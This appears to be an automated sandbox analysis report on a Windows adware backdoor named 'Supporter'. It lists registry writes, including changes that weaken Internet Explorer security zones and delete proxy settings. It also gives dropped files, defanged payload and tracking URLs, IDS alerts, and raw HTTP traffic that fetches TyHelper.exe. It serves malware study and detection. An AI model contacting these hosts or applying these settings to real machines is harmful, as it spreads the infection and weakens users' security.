"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e46c271e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"LRTS" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"27ddcf6f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Version" = "22022115"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"bbf88800" = "///%"
"f0bf0bde" = "///%"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BC 22 EC 7F EB E8 66 A0 18 30 12 CF 8D A6 41 3F"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"7f69fa1f" = "///%"
"6185d035" = "VP/h/CP/V//l////"
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"uuid" = "4520001523740530703"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"State" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
"e46c271e" = "///%"
"1520c6f1" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f0bf0bde" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"3c09c42b" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"a0743acc" = "N/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"370856c7" = ""

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c5705860" = "Vx////%%"
"dbaf3ce3" = "/P////%%"
"c99a5f5c" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2e22d94e" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"8b9e4cbc" = "V/////%%"
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"usr.1" = "mPgPJqqomjlhabcdef"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"svn" = "Supporter"
"svi" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1520c6f1" = "V/////%%"
"414bc593" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"51d2f2ea" = "JlA /Y//b/Ak/YZ/c//x/W//I//x/CD/Ux/e////"
"587b5709" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"svx" = ""
"svt" = "1421537600"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
"6185d035" = "VP/h/CP/V//l////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"bbf88800" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"Install_Dir" = "%Program Files%\Supporter"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0e93c3f3" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"340d3099" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"NoRepair" = "1"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"0dc3ee96" = "/P////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"date" = "1421549098"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"65114b36" = "Vl/l////"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"f6ad6fa6" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2d71d5ab" = "V/////%%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\SUPPOR~1\SUPPOR~1.DLL,_uninstall /un"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"a1dcff5b" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"dlpath" = "c:\progra~1\suppor~1\suppor~1.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"2e22d94e" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c6c5dd44" = "V/////%%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"uuid" = "4520001523740530703"
"svpath" = "c:\Program Files\Supporter\Supporter.dll"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"48bd1aff" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.0" = "Us ACoyoi 0Qlyurpnwx3D2nv2Ut4mOfyO1WapHlU9CKgtsUB7YxfB3uleoimov9WVC6rV2pn"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
"0e93c3f3" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"d1abcdb6" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{40030ae4}]
"InstallDate" = "20140118"

[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"40030ae4" = "%Program Files%\Supporter\Supporter.dll"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"72758a5d" = "///%"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c99a5f5c" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"38583bc3" = "N//e/Ct/Vx/l/C/////%"
"7367429f" = "///%"

[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"37b7a6d8" = "UlAr/XJ/c//k////"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"c24899a6" = "Vx/g/CD/Mx////%%"
"7f69fa1f" = "///%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]
"data.1" = "vPDqmdgAz93mBQIKEGmwWrniVNmX4IyloC5C8UlL9Tzl kgwiT507PnkLLOUSDtbV5/KcNAaxKop4V7umwZJwEJLo"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
"fe94ce1e" = "V/////%%"

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\00000000]
"3efeb33e" = ""

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Backdoor modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Backdoor modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Backdoor modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The Backdoor deletes the following registry key(s):

[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4\eae10f9d]
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_40030ae4]

The Backdoor deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
8af622327e2c6ef36dd2b147ec7d25b7 c:\Program Files\Follow\Follow.exe
d32d158eff9112caba8eea4ba9ca5975 c:\Program Files\PriceLeses\NoXzg4pkazG9ZC.dll
8af622327e2c6ef36dd2b147ec7d25b7 c:\Program Files\PriceLeses\NoXzg4pkazG9ZC.exe
d32d158eff9112caba8eea4ba9ca5975 c:\Program Files\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.dll
8af622327e2c6ef36dd2b147ec7d25b7 c:\Program Files\YoUtuBeeAdBlockke\tBHkQAIhf0vZPR.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 356105 356352 4.87791 107f80c7b2497b87f17b6053858abc7c
.rdata 360448 20226 20480 3.32227 0425f360dbef9ea530c9d62bd96a0497
.data 380928 863812 854016 4.18045 be5e4e00140775f479c4438504b275b9
.rsrc 1245184 112471 114688 3.73244 520e3ad746a2e820383856d794eb62d1
.reloc 1359872 9890 10240 3.164 ae41b41c919a7e9d9def9fe8386787e2

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://flagmisterlibcontent.net/
hxxp://flagmisterlibcontent.net/?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A
hxxp://flagmisterlibcontent.net/?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A
hxxp://masterial.net/?e=dfd73&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=55680&&&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 104.28.23.111
hxxp://flagmisterlibcontent.net/?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A
hxxp://bestories.org/?e=ytr&cht=2&dd=19&clsb=1&publisher=55680&country=US&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 104.28.11.38
hxxp://flagmisterlibcontent.net/?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A
hxxp://bestories.org/?e=bsp&clsb=1&publisher=55680&country=US&dd=5&cid=767&vn=153&ind=2999701604659561094&exid=&ssd=5870984237522070412&hid=4520001523740530703&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140118 104.28.11.38
hxxp://flagmisterlibcontent.net/?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A
hxxp://settlemental.net/TyHelper.exe 54.68.119.243
hxxp://c1.winnerican.info/?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A 54.69.32.99
hxxp://c1.winnerican.info/?step_id=1_1_4&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A 54.69.32.99
hxxp://r1.flagmisterlibcontent.net/ 54.69.32.99
hxxp://c1.winnerican.info/?step_id=1_1_3&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A 54.69.32.99
hxxp://c1.winnerican.info/?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A 54.69.32.99
hxxp://c1.winnerican.info/?step_id=1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A 54.69.32.99


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE W32/InstallRex.Adware Initial CnC Beacon
SURICATA STREAM ESTABLISHED packet out of window
SURICATA STREAM Packet with invalid ack
SURICATA STREAM ESTABLISHED invalid ack
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile

Traffic

HEAD /TyHelper.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: settlemental.net
Connection: Keep-Alive


HTTP/1.1 100 Continue
HTTP/1.1 200 OK..Server: openresty..Date: Sun, 18 Jan 2015 04:44:26 GM
T..Content-Type: application/octet-stream..Content-Length: 6475776..La
st-Modified: Fri, 09 Jan 2015 04:20:07 GMT..Connection: close..ETag: "
54af56f7-62d000"..Accept-Ranges: bytes..



GET /?step_id=1_2&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:44:23 GMT
Content-Type: text/html
Content-Length: 8282
Connection: close
Content-Disposition: attachment; filename="1_2.txt"
..B.H.a.D.W.E.e.6.n.H.k.X.a.f.H.r.p.n.O.3.0.p.F.k.D.e.u.8.y.H.u.4.q.C.
K.4.s.J.b.D.E.E. .h.U.Y.L.K.z.w.L.i.K.M.3.b.Q.Y.d.G.0.Q.B.m.g.7.I.G.H.
d.8.V.G.W.k.w.Q.6.0.N.Z.8.b.5.2.Q.5.D.I.Z.w.l.E.0.g.F.l.T.K.D.m.s.V. .
C.H.c.p.H.f.q.v.f.D.2.B. .7.E./.O.V.e.k.H.f.P.d.A.q.z.U.s.C.b.O.1.Z. .
d.w.p.2.M./.E.M.v.O.c.b.u.2.W.h.o.j.5.z.2.t.r.7.0.M.N.X.O.r.e. .U.7.k.
s.Q.z.Y.N.a.u.S.A.a.m.m.H.w.T.y.g.P.4.c.E.o.V.N.2.g.p. .S.V.p.S.y.a.x.
4./.o.v.H.i.Y.d.A.I.T.X.s.y.F.X.0.L.L.z.M.p.B.E.B.A.8.K.V.y.z.V.P.t.7.
k.B.6.v.v. .l.z.e.z.7.S.6.T.i.C./.h.s.j.p.u.L.m.h.U.v.l.a./.O.b.Q.M.b.
V.n.q.H.P.3.y.0.4.n.w.9.o.C.v.V.5.y.K.L.7.7.4.k.a.A.V.b.g.N.X.N.v.7.T.
3.5.a.y.I.9.0.y.t.U.o.U.H.L.L.L.L.8.d.s.p.T.V.B.s.E.9.F.m.O.e.M.V.O.R.
7.z.G.w.W.F.o.6.d.H.l.x.c.k.L.w.p.C. .X.B.Q.x.n.L.T.O.n.v.y.B.A.4.m.G.
w.1.L.m.O.C.y.L.V.e.h.Y.W.I.J.l.z.L.V.8.W.e.4.x.Y.X.w.E.Q.o.1.V.d.C.n.
G.G.l.p.n.G.0.R.R.m.3.J.I.6.B.W.i.x.J.r.H.X.l.c.8.i.m.6.8.J.p.T.5.j.k.
e.M.o.W.I.U.a.7.B.g.9.6.6.D.l.6.l.J.J.W.K.B.5.H.Z.r.K.B.U.u.P.Q.W.x.5.
N.r.D.0.V.f.7.4.M.m.P.w.5.z.K.8.n.D.9.L.Q.O.b.R.b.a.6.q.I.s.z.y.u.S.l.
Q.M.w.K. .G.z.Y.i.d.o.Z.Q.Z.i.K.q.i.N.U.5.D.u.t.x.8.7.O.b.j.5.Q.h.l.i.
G.a.3.E.x.N.k.E.u.3.W.X.l.r.w.K.z.G.S.v.7.y.5.r.0.3.J.y./.g.s.2.H.2.q.
s.R.J.P.Z.A.J.K.t./.N.y.T.N.x.C.m.b.Z.w./.R.R.P.u.b.6.G.y.g.v. .D.2.X.
g.w.V./.N.r.Y.v.C.u.E.H.O.y.3.j.r.Q.6.Z.5.5.4.I.5.M.v.c.8.w.f.q.N.S. .
Y.b.H.K.y.I.z.A.n.D.h.8.Q.5.r.k.x.d.o.C.M.7.r.M./.G.k.C.K.t.U.4.j.T.F.
Q.y.0. .y.4.o.s.I.X.y.v.U.l.d.u.O.V.M.O.6.K.A.V.O.B.1.T.7.O.s.H.z.a.v.
/.L.5.o.K.9.l.Y.l.H.d.C.C.Q.h.5.8.S.m.P.3.3.I.v.n.v.k.u.f.2.f.Y.C.
<<< skipped >>>


GET /?step_id=1_1&sf=1&installer_id=2999701604659561094&publisher_id=55680&source_id=0&page_id=0&affiliate_id=0&country_code=US&locale=EN&browser_id=4&download_id=4976205046005262422&external_id=0&installer_type=IX_2013&hardware_id=4520001523740530703&session_id=5870984237522070412&custom=silent installer&pic_installer_ver=2&installer_type=IX_2013&include_signature=0&pic=1&st=0&include_signature=0&uuid=%2A HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.winnerican.info
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: ngx_openresty
Date: Sun, 18 Jan 2015 04:43:38 GMT
Content-Type: text/html
Content-Length: 10014
Connection: close
Content-Disposition: attachment; filename="1_1.txt"
..P.6.9.J.3.Z.T.J.5.R.p.H.W.f.H.b.c.d.k.a.x.M.O.A.k. . .K.S.y.V.J.Y.N.
W.r.s.j.C.T.3.q.e.c.s.o.5.V.j.R.f.y. .R.f.P.s.Q.j.k.9.A.q.S.I.t.x.U.m.
W.z.I.K.M.v.j.s./.J.9.3.N.K.t.i.I.y.5.C.z.r.B.k.g.I.0.A.8.s.h.y.c.S.d.
Y.e.0.3.c.l.Q.r.i.2.m.2.k.a./.h.n. .D.G.O.Y.R.2.B.5.B.9.3.V.x.T.T.D.l.
i.a.N.I.8.L.B.D.1.k.j.p.P.8.J.l.F.7.v.P.3.q.n.X.I.B.h.R.y.O.x.b.Z.D.p.
L.c.x.I.O.q.A.d.p.T.y.m.7.w.j.e.Z.I.a.2.F.t.l.c.q.N.L.D.n.F.K.b.9.V.x.
U.M.Y.Q.S.m.U.z.n.N.U.W.o.A.R.P.d.Y.I.r.c.1.M.G.O.f.r.U.d.d.T.c.v.J.w.
M.c.E.D.g.x.Z.r.f.o.V.e.q.7.N.5.P.J.X.u.7.e.B.P.Z.9.M.6.7.U.x.H.m.w.R.
w.h.g. .a.J.E.p.Y.8.A.L.G.5.p.D.g.T.Z.e.m.2. .A.V.9.G.w.C.s.o.k.b.4.l.
/.P.I.p.Y.V.X.s.a.p.d.x.K.z.0.d.J.H.t.3.r.0.D.l.7.h.n.M.F.T.L.d.0.L.o.
0.C.K.R.3.b.F.k.2.q.e.1.w.D.q.o.0.g.y. .9.W.A.y.4.N.Z.Q.a.2.N.U.k.F.N.
 .d.F.w.O.F.y.X.H.j.p.1.W.p.C.B.X.G.j.K.D.e.U.r.8.J.b.4.D.Q.n.x.s.q.B.
